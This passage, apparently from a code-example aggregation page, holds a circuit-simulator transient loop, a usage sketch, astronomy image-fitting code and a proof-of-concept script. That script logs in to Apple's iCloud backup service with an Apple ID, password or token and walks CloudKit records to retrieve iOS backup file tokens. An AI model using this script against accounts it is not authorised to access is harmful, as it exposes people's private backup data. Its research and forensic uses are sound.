    # setup the df method
    printing.print_info_line(("Selecting the appropriate DF ("+method+")... ", 5), verbose, print_nl=False)
    if method == IMPLICIT_EULER:
        from . import implicit_euler as df
    elif method == TRAP:
        from . import trap as df
    elif method == GEAR1:
        from . import gear as df
        df.order = 1
    elif method == GEAR2:
        from . import gear as df
        df.order = 2
    elif method == GEAR3:
        from . import gear as df
        df.order = 3
    elif method == GEAR4:
        from . import gear as df
        df.order = 4
    elif method == GEAR5:
        from . import gear as df
        df.order = 5
    elif method == GEAR6:
        from . import gear as df
        df.order = 6
    else:
        df = import_custom_df_module(method, print_out=(outfile != "stdout"))
        # df is none if module is not found

    if df is None:
        sys.exit(23)

    if not df.has_ff() and use_step_control:
        printing.print_warning("The chosen DF does not support step control. Turning off the feature.")
        use_step_control = False
        #use_aposteriori_step_control = False

    printing.print_info_line(("done.", 5), verbose)

    # setup the data buffer
    # if you use the step control, the buffer has to be one point longer.
    # That's because the excess point is used by a FF in the df module to predict the next value.
    printing.print_info_line(("Setting up the buffer... ", 5), verbose, print_nl=False)
    ((max_x, max_dx), (pmax_x, pmax_dx)) = df.get_required_values()
    if max_x is None and max_dx is None:
        printing.print_general_error("df doesn't need any value?")
        sys.exit(1)
    if use_step_control:
        buffer_len = 0
        for mx in (max_x, max_dx, pmax_x, pmax_dx):
            if mx is not None:
                buffer_len = max(buffer_len, mx)
        buffer_len += 1
        thebuffer = dfbuffer(length=buffer_len, width=3)
    else:
        thebuffer = dfbuffer(length=max(max_x, max_dx) + 1, width=3)
    thebuffer.add((tstart, x0, None)) #setup the first values
    printing.print_info_line(("done.", 5), verbose) #FIXME

    #setup the output buffer
    if return_req_dict:
        output_buffer = dfbuffer(length=return_req_dict["points"], width=1)
        output_buffer.add((x0,))
    else:
        output_buffer = None

    # import implicit_euler to be used in the first iterations
    # this is because we don't have any dx when we start, nor any past point value
    if (max_x is not None and max_x > 0) or max_dx is not None:
        from . import implicit_euler
        first_iterations_number = max_x if max_x is not None else 1
        first_iterations_number = max( first_iterations_number, max_dx+1) \
                                  if max_dx is not None else first_iterations_number
    else:
        first_iterations_number = 0

    printing.print_info_line(("MNA (reduced):", 5), verbose)
    printing.print_info_line((mna, 5), verbose)
    printing.print_info_line(("D (reduced):", 5), verbose)
    printing.print_info_line((D, 5), verbose)

    # setup the initial values to start the iteration:
    x = None
    time = tstart
    nv = circ.get_nodes_number()

    Gmin_matrix = dc_analysis.build_gmin_matrix(circ, options.gmin, mna.shape[0], verbose)

    # the step is generated automatically, but never exceed the supplied one.
    if use_step_control:
        #tstep = min((tstop-tstart)/9999.0, HMAX, 100.0 * options.hmin)
        tstep = min((tstop-tstart)/9999.0, HMAX)
    printing.print_info_line(("Initial step: %g"% (tstep,), 5), verbose)

    if max_dx is None:
        max_dx_plus_1 = None
    else:
        max_dx_plus_1 = max_dx +1
    if pmax_dx is None:
        pmax_dx_plus_1 = None
    else:
        pmax_dx_plus_1 = pmax_dx +1

    # setup error vectors
    aerror = np.zeros((x0.shape[0], 1))
    aerror[:nv-1, 0] = options.vea
    aerror[nv-1:, 0] = options.vea
    rerror = np.zeros((x0.shape[0], 1))
    rerror[:nv-1, 0] = options.ver
    rerror[nv-1:, 0] = options.ier

    iter_n = 0  # iteration counter
    # when to start predicting the next point
    start_pred_iter = max(*[i for i in (0, pmax_x, pmax_dx_plus_1) if i is not None])
    lte = None
    sol = results.tran_solution(circ, tstart, tstop, op=x0, method=method, outfile=outfile)
    printing.print_info_line(("Solving... ", 3), verbose, print_nl=False)
    tick = ticker.ticker(increments_for_step=1)
    tick.display(verbose > 1)
    while time < tstop:
        if iter_n < first_iterations_number:
            x_coeff, const, x_lte_coeff, prediction, pred_lte_coeff = \
            implicit_euler.get_df((thebuffer.get_df_vector()[0],), tstep, \
            predict=(use_step_control and iter_n >= start_pred_iter))
        else:
            x_coeff, const, x_lte_coeff, prediction, pred_lte_coeff = \
                df.get_df(thebuffer.get_df_vector(), tstep,
                          predict=(use_step_control and
                                   iter_n >= start_pred_iter)
                         )

        if options.transient_prediction_as_x0 and use_step_control and prediction is not None:
            x0 = prediction
        elif x is not None:
            x0 = x

        x1, error, solved, n_iter = dc_analysis.dc_solve(
                                                     mna=(mna + np.multiply(x_coeff, D)),
                                                     Ndc=N,  Ntran=np.dot(D, const), circ=circ,
                                                     Gmin=Gmin_matrix, x0=x0,
                                                     time=(time + tstep),
                                                     locked_nodes=locked_nodes,
                                                     MAXIT=options.transient_max_nr_iter,
                                                     verbose=0
                                                     )

        if solved:
            old_step = tstep #we will modify it, if we're using step control otherwise it's the same
            # step control (yeah)
            if use_step_control:
                if x_lte_coeff is not None and pred_lte_coeff is not None and prediction is not None:
                    # this is the Local Truncation Error :)
                    lte = abs((x_lte_coeff / (pred_lte_coeff - x_lte_coeff)) * (prediction - x1))
                    # it should NEVER happen that new_step > 2*tstep, for stability
                    new_step_coeff = 2
                    for index in range(x.shape[0]):
                        if lte[index, 0] != 0:
                            new_value = ((aerror[index, 0] + rerror[index, 0]*abs(x[index, 0])) / lte[index, 0]) \
                            ** (1.0 / (df.order+1))
                            if new_value < new_step_coeff:
                                new_step_coeff = new_value
                            #print new_value
                    new_step = tstep * new_step_coeff
                    if (options.transient_use_aposteriori_step_control and
                        new_step_coeff <
                        options.transient_aposteriori_step_threshold):
                        # don't recalculate x for a small change
                        tstep = check_step(new_step, time, tstop, HMAX)
                        #print "Apost. (reducing) step = "+str(tstep)
                        continue
                    tstep = check_step(new_step, time, tstop, HMAX) # used in the next iteration
                    #print "Apriori tstep = "+str(tstep)
                else:
                    #print "LTE not calculated."
                    lte = None
            if print_step_and_lte and lte is not None:
                # if you wish to look at the step: we print just the LTE
                flte.write(str(time)+"\t"+str(old_step)+"\t"+str(lte.max())+"\n")
            # if we get here, either aposteriori_step_control is
            # disabled, or it's enabled and the error is small
            # enough. Anyway, the result is GOOD, STORE IT.
            time = time + old_step
            x = x1
            iter_n = iter_n + 1
            sol.add_line(time, x)

            dxdt = np.multiply(x_coeff, x) + const
            thebuffer.add((time, x, dxdt))
            if output_buffer is not None:
                output_buffer.add((x, ))
            tick.step()
        else:
            # If we get here, Newton failed to converge. We need to reduce the step...
            if use_step_control:
                tstep = tstep/5.0
                tstep = check_step(tstep, time, tstop, HMAX)
                printing.print_info_line(("At %g s reducing step: %g s (convergence failed)" % (time, tstep), 5), verbose)
            else: #we can't reduce the step
                printing.print_general_error("Can't converge with step "+str(tstep)+".")
                printing.print_general_error("Try setting --t-max-nr to a higher value or set step to a lower one.")
                solved = False
                break
        if options.transient_max_time_iter and iter_n == options.transient_max_time_iter:
            printing.print_general_error("MAX_TIME_ITER exceeded ("+str(options.transient_max_time_iter)+"), iteration halted.")
            solved = False
            break

    if print_step_and_lte:
        flte.close()

    tick.hide(verbose > 1)

    if solved:
        printing.print_info_line(("done.", 3), verbose)
        printing.print_info_line(("Average time step: %g" % ((tstop - tstart)/iter_n,), 3), verbose)

        if output_buffer:
            ret_value = output_buffer.get_as_matrix()
        else:
            ret_value = sol
    else:
        print("failed.")
        ret_value =  None

    return ret_value
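
The docstring above summarizes the public signature: pass a circuit instance plus tstart/tstep/tstop, and note that invalid parameters (tstart > tstop, a negative tstep, or an unknown integration method) terminate the run via sys.exit. The snippet below is a hedged usage sketch assuming ahkab's documented Circuit API is available; the RC element names and values are invented for illustration.

from ahkab import circuit, transient

# A tiny RC low-pass driven by a 5 V DC source (values are illustrative).
rc = circuit.Circuit(title='rc lowpass')
gnd = rc.get_ground_node()
rc.add_vsource('V1', 'in', gnd, dc_value=5)
rc.add_resistor('R1', 'in', 'out', value=1e3)
rc.add_capacitor('C1', 'out', gnd, value=1e-6)

# tstart=0 and method='TRAP' mirror the defaults described in the docstring.
# With outfile='stdout' the results go to standard output instead of a file.
sol = transient.transient_analysis(rc, tstart=0, tstep=1e-6, tstop=5e-3,
                                    method='TRAP', outfile='stdout')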

Example 35

Project: iOS9_iCloud_POC
Source File: iOS9_iCloud_POC.py
View license
def main():
    # TODO can we retrieve these?
    global device_ID
    global device_name
    device_ID = random_bytes(32)
    device_name = 'My iPhone'

    # Parse arguments
    arguments = docopt(__doc__, version='iOS9_iCloud_POC 1.0')

    apple_id = arguments['<appleid>']
    apple_pw = arguments['<password>']
    if arguments['<token>']:
        dsPrsID, mmeAuthToken = arguments['<token>'].split(':')
        SKIP_AUTH = True
    else:
        SKIP_AUTH = False

    device_index = int(arguments['--device'] or 0)
    snapshot_index = int(arguments['--snapshot'] or 0)
    manifest_index = int(arguments['--manifest'] or 0)


    ####################################################################################################################
    # Step 1: Authentication
    ####################################################################################################################
    if not SKIP_AUTH:
        debug('Step 1: Authentication')

        auth = 'Basic %s' % base64.b64encode('%s:%s' % (apple_id, apple_pw))
        authenticateResponse = plist_request('setup.icloud.com', 'POST', '/setup/authenticate/$APPLE_ID$', '',
                                                             {'Authorization': auth,
                                                              'Connection': 'Keep-Alive'})
        if not authenticateResponse:
            debug('Invalid Apple ID/password?')
            sys.exit(1)
        pprint(authenticateResponse)

        dsPrsID = str(authenticateResponse['appleAccountInfo']['dsPrsID'])
        mmeAuthToken = authenticateResponse['tokens']['mmeAuthToken']
        if arguments['--token']:
            print '\nToken: %s:%s' % (dsPrsID, mmeAuthToken)
            sys.exit(1)

        # Cookies don't seem to be required
        #cookie = result_headers['set-cookie'].split(';')[0]

    else:
        debug('Skipping Step 1 (Authentication)')

    # noinspection PyUnboundLocalVariable
    auth = 'Basic %s' % base64.b64encode('%s:%s' % (dsPrsID, mmeAuthToken))


    ####################################################################################################################
    # STEP 2. Account settings.
    ####################################################################################################################
    debug('\nSTEP 2. Account settings.')
    if not SKIP_AUTH:
        account_settings = plist_request('setup.icloud.com', 'POST', '/setup/get_account_settings', '',
                                                            {'Authorization': auth,
                                                             'X-MMe-Client-Info': Client_Info,
                                                             'User-Agent': USER_AGENT_UBD
                                                             # 'Cookie': cookie
                                                             })
    else:
        account_settings = plist_request('setup.icloud.com', 'POST', '/setup/get_account_settings', '',
                                                            {'Authorization': auth,
                                                             'X-MMe-Client-Info': Client_Info,
                                                             'User-Agent': USER_AGENT_UBD})

    pprint(account_settings)
    cloud_kit_token = account_settings['tokens']['cloudKitToken']
    # if SKIP_AUTH:
    #     cookie = result_headers['set-cookie'].split(';')[0]


    ####################################################################################################################
    # STEP 3. CloudKit Application Initialization.
    ####################################################################################################################
    debug('\nSTEP 3. CloudKit Application Initialization.')
    # Note: we aren't passing all the headers that Inflatable does, or even all that the real iPhone does,
    # but our responses seem to be the same.
    cloudkit_init = json_request('setup.icloud.com', 'POST', '/setup/ck/v1/ckAppInit?container=com.apple.backup.ios', '',
                                    {'Authorization': auth,
                                     'X-MMe-Client-Info': Client_Info,
                                     'X-CloudKit-AuthToken': cloud_kit_token,
                                     'X-CloudKit-ContainerId': 'com.apple.backup.ios',
                                     'X-CloudKit-BundleId': 'com.apple.backupd',
                                     'X-CloudKit-Environment': 'production',
                                     'X-CloudKit-Partition': 'production',
                                     'User-Agent': USER_AGENT_UBD
                                     # 'Cookie': cookie
                                     })

    pprint(cloudkit_init)

    ckdatabase_host = urlparse(cloudkit_init['cloudKitDatabaseUrl']).hostname
    cloudkit_user_id = cloudkit_init['cloudKitUserId']


    ####################################################################################################################
    # STEP 4. Record zones.
    #Returns record zone data which needs further analysis.
    ####################################################################################################################
    debug('\nSTEP 4. Record zones.')

    requestOperation = retrieve_request(201)
    # zoneRetrieveRequest
    zrr = requestOperation.zoneRetrieveRequest
    zrr.zoneIdentifier.value.name = 'mbksync'
    zrr.zoneIdentifier.value.type = 6
    zrr.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    zrr.zoneIdentifier.ownerIdentifier.type = 7

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header = {'X-MMe-Client-Info': Client_Info,
                       'X-Apple-Request-UUID': random_guid(),
                       'X-CloudKit-UserId': cloudkit_user_id,
                       'X-CloudKit-AuthToken': cloud_kit_token,
                       'X-CloudKit-ContainerId': 'com.apple.backup.ios',
                       'X-CloudKit-BundleId': 'com.apple.backupd',
                       'X-CloudKit-ProtocolVersion': 'client=1;comments=1;device=1;presence=1;records=1;sharing=1;subscriptions=1;users=1;mescal=1;',
                       'Accept': 'application/x-protobuf',
                       'Content-Type': 'application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true',
                       'User-Agent': USER_AGENT_UBD
                       # 'Cookie': cookie
                       }

    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    zone_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(zone_retrieve_response)


    ####################################################################################################################
    #STEP 5. Backup list
    #Returns device data/ backups.
    ####################################################################################################################
    debug('\nSTEP 5. Backup list.')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = 'BackupAccount'
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = 'mbksync'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    # What is this thing? Is it really an id associated with a particular backup?
    devices = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'devices'
    )
    if device_index >= len(devices.recordFieldValue):
        print 'No such device. Available devices: %s' % devices
        sys.exit(1)

    backup_id = devices.recordFieldValue[device_index].referenceValue.recordIdentifier.value.name


    ####################################################################################################################
    #STEP 6. Snapshot list (+ Keybag)
    # Message type 211 with the required backup uuid, protobuf array encoded.
    #          Returns device/ snapshots/ keybag information.
    #          Timestamps are hex encoded double offsets to 01 Jan 2001 00:00:00 GMT (Cocoa/ Webkit reference date).
    ####################################################################################################################
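    # Illustrative conversion (names here are hypothetical): the Cocoa/WebKit
    # reference date 2001-01-01 00:00:00 GMT is Unix time 978307200, so a
    # decoded offset can be turned into a datetime with, e.g.,
    #     datetime.datetime.utcfromtimestamp(978307200 + cocoa_seconds)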
    debug('\nSTEP 6. Snapshot list (+ Keybag)')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = backup_id
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = 'mbksync'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    snapshots = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'snapshots'
    )

    if snapshot_index >= len(snapshots.recordFieldValue):
        print 'No such snapshot. Available snapshots: %s' % snapshots
        sys.exit(0)

    a_snapshot = snapshots.recordFieldValue[snapshot_index].referenceValue.recordIdentifier.value.name

    current_keybag_UUID = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'currentKeybagUUID'
    ).stringValue


    ####################################################################################################################
    # STEP 7. Manifest list.
    #
    #          Url/ headers as step 6.
    #          Message type 211 with the required snapshot uuid, protobuf array encoded.
    #          Returns system/ backup properties (bytes ? format ?? proto), quota information and manifest details.
    ####################################################################################################################
    debug('\nSTEP 7. Manifest list')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = a_snapshot
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = 'mbksync'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    manifest_ids = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'manifestIDs'
    )
    if manifest_index >= len(manifest_ids.recordFieldValue):
        print 'No such manifest. Available manifests: %s' % manifest_ids
        sys.exit(1)
    a_manifest_id = manifest_ids.recordFieldValue[manifest_index].stringValue


    ########################################################################################################################
    # STEP 8. Retrieve list of files.
    #
    #          Url/ headers as step 7.
    #          Message type 211 with the required manifest, protobuf array encoded.
    #          Returns system/ backup properties (bytes ? format ?? proto), quota information and manifest details.
    #
    #          Returns a somewhat familiar-looking set of results, but with encoded bytes.
    ########################################################################################################################
    debug('\nSTEP 8. Retrieve list of files.')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = a_manifest_id + ':0'
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = '_defaultZone'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    asset_tokens = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'files'
    )

    if asset_tokens is None:
        print 'No files found'
        sys.exit(0)

    # Right now just grabbing the first file.
    # InflatableDonkey looks for the first file that is non 0 length
    # an_asset_token = asset_tokens.recordFieldValue[0].referenceValue.recordIdentifier.value.name
    length = 0
    an_asset_token = None
    for record_field_value in asset_tokens.recordFieldValue:
        an_asset_token = record_field_value.referenceValue.recordIdentifier.value.name
        # F:UUID:token:length:x
        _, uuid, token, length, x = an_asset_token.split(':')
        if int(length) > 0: break
    if int(length) == 0:
        print 'All files are 0 length'
        sys.exit(0)


    ########################################################################################################################
    # STEP 9. Retrieve asset tokens.
    #
    #          Url/ headers as step 8.
    #          Message type 211 with the required file, protobuf array encoded.
    ########################################################################################################################
    debug('\nSTEP 9. Retrieve asset tokens.')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = an_asset_token
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = '_defaultZone'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    value = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'contents'
    )
    # I think these are file attributes
    try:
        asset_value = value.assetValue
    except AttributeError:
        print 'No asset token found.'
        sys.exit(0)


    ####################################################################################################################
    # STEP 10. AuthorizeGet.
    #
    #          Process somewhat different to iOS8.
    #
    #          New headers/ mmcs auth token. See AuthorizeGetRequestFactory for details.
    #          Returns a ChunkServer.FileGroup protobuf which is largely identical to iOS8
    ####################################################################################################################
    debug('\nSTEP 10. AuthorizeGet.')

    mmcsAuthToken = '%s %s %s' % (
        asset_value.fileChecksum.encode('hex'),
        asset_value.fileSignature.encode('hex'),
        asset_value.downloadToken
    )

    headers = {
        'Accept': 'application/vnd.com.apple.me.ubchunk+protobuf',
        'Content-Type': 'application/vnd.com.apple.me.ubchunk+protobuf',
        'x-apple-mmcs-dataclass': 'com.apple.Dataclass.CloudKit',
        'X-CloudKit-Container': 'com.apple.backup.ios',
        'X-CloudKit-Zone': '_defaultZone',
        'x-apple-mmcs-auth': mmcsAuthToken,
        'x-apple-mme-dsid': dsPrsID,
        'User-Agent': USER_AGENT_UBD,
        'x-apple-mmcs-proto-version': '4.0',
        'X-Mme-Client-Info': '<iPhone5,3> <iPhone OS;9.0.1;13A404> <com.apple.cloudkit.CloudKitDaemon/479 (com.apple.cloudd/479)>'
    }

    # The body is a protobuf object FileTokens
    file_tokens = FileTokens()
    file_token = file_tokens.fileTokens.add()
    file_token.fileChecksum = asset_value.fileChecksum
    file_token.token = asset_value.downloadToken
    file_token.fileSignature = asset_value.fileSignature

    body = file_tokens.SerializeToString()
    host = urlparse(asset_value.contentBaseURL).hostname
    url = '/' + dsPrsID + '/authorizeGet'
    pbuf_string = request(host, 'POST', url, body, headers)

    file_groups = FileGroups()
    file_groups.ParseFromString(pbuf_string)

    debug(file_groups)


    ####################################################################################################################
    # STEP 11. ChunkServer.FileGroups.
    #
    # TODO.
    ####################################################################################################################


    ####################################################################################################################
    # STEP 12. Assemble assets/ files.
    ####################################################################################################################
    debug('\nSTEP 12. Assemble assets/files.')

    requestOperation = retrieve_request(220)
    # recordRetrieveRequest
    qrr = requestOperation.queryRetrieveRequest
    record_type = qrr.query.type.add()
    record_type.name = 'PrivilegedBatchRecordFetch'
    query_filter = qrr.query.filter.add()
    query_filter.fieldName.name = '___recordID'
    query_filter.fieldValue.type = 5
    query_filter.fieldValue.referenceValue.recordIdentifier.value.name = 'K:' + current_keybag_UUID
    query_filter.fieldValue.referenceValue.recordIdentifier.value.type = 1
    query_filter.fieldValue.referenceValue.recordIdentifier.zoneIdentifier.value.name = 'mbksync'
    query_filter.fieldValue.referenceValue.recordIdentifier.zoneIdentifier.value.type = 6
    query_filter.fieldValue.referenceValue.recordIdentifier.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    query_filter.fieldValue.referenceValue.recordIdentifier.zoneIdentifier.ownerIdentifier.type = 7
    query_filter.type = 1

    qrr.zoneIdentifier.value.name = 'mbksync'
    qrr.zoneIdentifier.value.type = 6
    qrr.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    qrr.zoneIdentifier.ownerIdentifier.type = 7
    qrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/query/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    debug('Done')
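
Stepping back from the protocol details, the guard clauses above (unknown device, snapshot, or asset) all share one shape: check a lookup, print a short diagnostic, and stop with sys.exit before any later step can run on missing data. Here is a small, hypothetical sketch of that shape in Python 3 syntax; the helper names are invented and not part of the project.

import sys
import base64


def basic_auth_header(user, secret):
    # Same 'Basic <base64(user:secret)>' header shape used in Step 1 above.
    token = base64.b64encode(('%s:%s' % (user, secret)).encode('utf-8'))
    return 'Basic %s' % token.decode('ascii')


def pick(items, index, label):
    # Bail out early, like the device/snapshot/manifest index checks above.
    if index >= len(items):
        print('No such %s (%d available)' % (label, len(items)))
        sys.exit(1)
    return items[index]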

Example 36

Project: tractor
Source File: scuss.py
View license
def main():
    import optparse

    parser = optparse.OptionParser('%prog [options]')
    parser.add_option('-o', dest='outfn', help='Output filename (FITS table)')
    parser.add_option('-i', dest='imgfn', help='Image input filename')
    parser.add_option('-f', dest='flagfn', help='Flags input filename')
    parser.add_option('-p', dest='psffn', help='PsfEx input filename')
    parser.add_option('-s', dest='postxt', help='Source positions input text file')
    parser.add_option('-S', dest='statsfn', help='Output image statistics filename (FITS table); optional')

    parser.add_option('-g', dest='gaussianpsf', action='store_true',
                      default=False,
                      help='Use multi-Gaussian approximation to PSF?')
    
    parser.add_option('-P', dest='plotbase', default='scuss',
                      help='Plot base filename (default: %default)')
    opt,args = parser.parse_args()

    # Check command-line arguments
    if len(args):
        print('Extra arguments:', args)
        parser.print_help()
        sys.exit(-1)
    for fn,name,exists in [(opt.outfn, 'output filename (-o)', False),
                           (opt.imgfn, 'image filename (-i)', True),
                           (opt.flagfn, 'flag filename (-f)', True),
                           (opt.psffn, 'PSF filename (-p)', True),
                           (opt.postxt, 'Source positions filename (-s)', True),
                           ]:
        if fn is None:
            print('Must specify', name)
            sys.exit(-1)
        if exists and not os.path.exists(fn):
            print('Input file', fn, 'does not exist')
            sys.exit(-1)

    # outfn = 'tractor-scuss.fits'
    # imstatsfn = 'tractor-scuss-imstats.fits'
    

    # Read inputs
    print('Reading input image', opt.imgfn)
    img = fitsio.read(opt.imgfn)
    print('Read img', img.shape, img.dtype)
    H,W = img.shape
    
    posfn = opt.postxt + '.fits'
    if not os.path.exists(posfn):
        from astrometry.util.fits import streaming_text_table
        hdr = 'ra dec x y objid sdss_psfmag_u sdss_psfmagerr_u'
        d = np.float64
        f = np.float32
        types = [str,str,d,d,str,f,f]
        print('Reading positions', opt.postxt)
        T = streaming_text_table(opt.postxt, headerline=hdr, coltypes=types)
        T.writeto(posfn)
        print('Wrote', posfn)

    print('Reading positions', posfn)
    T = fits_table(posfn)
    print('Read', len(T), 'source positions')
    
    print('Reading flags', opt.flagfn)
    flag = fitsio.read(opt.flagfn)
    print('Read flag', flag.shape, flag.dtype)

    print('Reading PSF', opt.psffn)
    psf = PsfEx(opt.psffn, W, H)

    if opt.gaussianpsf:
        picpsffn = opt.psffn + '.pickle'
        if not os.path.exists(picpsffn):
            psf.savesplinedata = True
            print('Fitting PSF model...')
            psf.ensureFit()
            pickle_to_file(psf.splinedata, picpsffn)
            print('Wrote', picpsffn)
        else:
            print('Reading PSF model parameters from', picpsffn)
            data = unpickle_from_file(picpsffn)
            print('Fitting PSF...')
            psf.fitSavedData(*data)
            
    print('Computing image sigma...')
    plo,phi = [np.percentile(img[flag == 0], p) for p in [25,75]]
    # Wikipedia says:  IQR -> sigma:
    sigma = (phi - plo) / (0.6745 * 2)
    print('Sigma:', sigma)
    invvar = np.zeros_like(img) + (1./sigma**2)
    invvar[flag != 0] = 0.
    
    # Estimate sky level from median -- not actually necessary, since
    # we will fit it below...
    med = np.median(img[flag == 0])
    
    band = 'u'
    
    # We will break the image into cells for speed -- save the
    # original full-size inputs here.
    fullinvvar = invvar
    fullimg  = img
    fullflag = flag
    fullpsf  = psf
    fullT = T

    # We add a margin around each cell -- we want sources within the
    # cell, we need to include a margin of image pixels touched by
    # those sources, and also an additional margin of sources that
    # touch those pixels.
    margin = 10 # pixels
    # Number of cells to split the image into
    nx = 10
    ny = 10
    # cell positions
    XX = np.round(np.linspace(0, W, nx+1)).astype(int)
    YY = np.round(np.linspace(0, H, ny+1)).astype(int)
    
    results = []

    # Image statistics
    imstats = fits_table()
    imstats.xlo = np.zeros(((len(YY)-1)*(len(XX)-1)), int)
    imstats.xhi = np.zeros_like(imstats.xlo)
    imstats.ylo = np.zeros_like(imstats.xlo)
    imstats.yhi = np.zeros_like(imstats.xlo)
    imstats.ninbox = np.zeros_like(imstats.xlo)
    imstats.ntotal = np.zeros_like(imstats.xlo)
    imstatkeys = ['imchisq', 'imnpix', 'sky']
    for k in imstatkeys:
        imstats.set(k, np.zeros(len(imstats)))
    
    # Plots:
    ps = PlotSequence(opt.plotbase)
    
    # Loop over cells...
    celli = -1
    for yi,(ylo,yhi) in enumerate(zip(YY, YY[1:])):
        for xi,(xlo,xhi) in enumerate(zip(XX, XX[1:])):
            celli += 1
            imstats.xlo[celli] = xlo
            imstats.xhi[celli] = xhi
            imstats.ylo[celli] = ylo
            imstats.yhi[celli] = yhi
            print()
            print('Doing image cell %i: x=[%i,%i), y=[%i,%i)' % (celli, xlo,xhi,ylo,yhi))
            # We will fit for sources in the [xlo,xhi), [ylo,yhi) box.
            # We add a margin in the image around that ROI
            # Beyond that, we add a margin of extra sources
    
            # image region: [ix0,ix1)
            ix0 = max(0, xlo - margin)
            ix1 = min(W, xhi + margin)
            iy0 = max(0, ylo - margin)
            iy1 = min(H, yhi + margin)
            S = (slice(iy0, iy1), slice(ix0, ix1))

            img = fullimg[S]
            invvar = fullinvvar[S]

            if not opt.gaussianpsf:
                # Instantiate pixelized PSF at this cell center.
                pixpsf = fullpsf.instantiateAt((xlo+xhi)/2., (ylo+yhi)/2.)
                print('Pixpsf:', pixpsf.shape)
                psf = PixelizedPSF(pixpsf)
            else:
                psf = fullpsf
            psf = ShiftedPsf(fullpsf, ix0, iy0)
            
            # sources nearby
            x0 = max(0, xlo - margin*2)
            x1 = min(W, xhi + margin*2)
            y0 = max(0, ylo - margin*2)
            y1 = min(H, yhi + margin*2)
            
            # (SCUSS uses FITS pixel indexing, so -1)
            J = np.flatnonzero((fullT.x-1 >= x0) * (fullT.x-1 < x1) *
                               (fullT.y-1 >= y0) * (fullT.y-1 < y1))
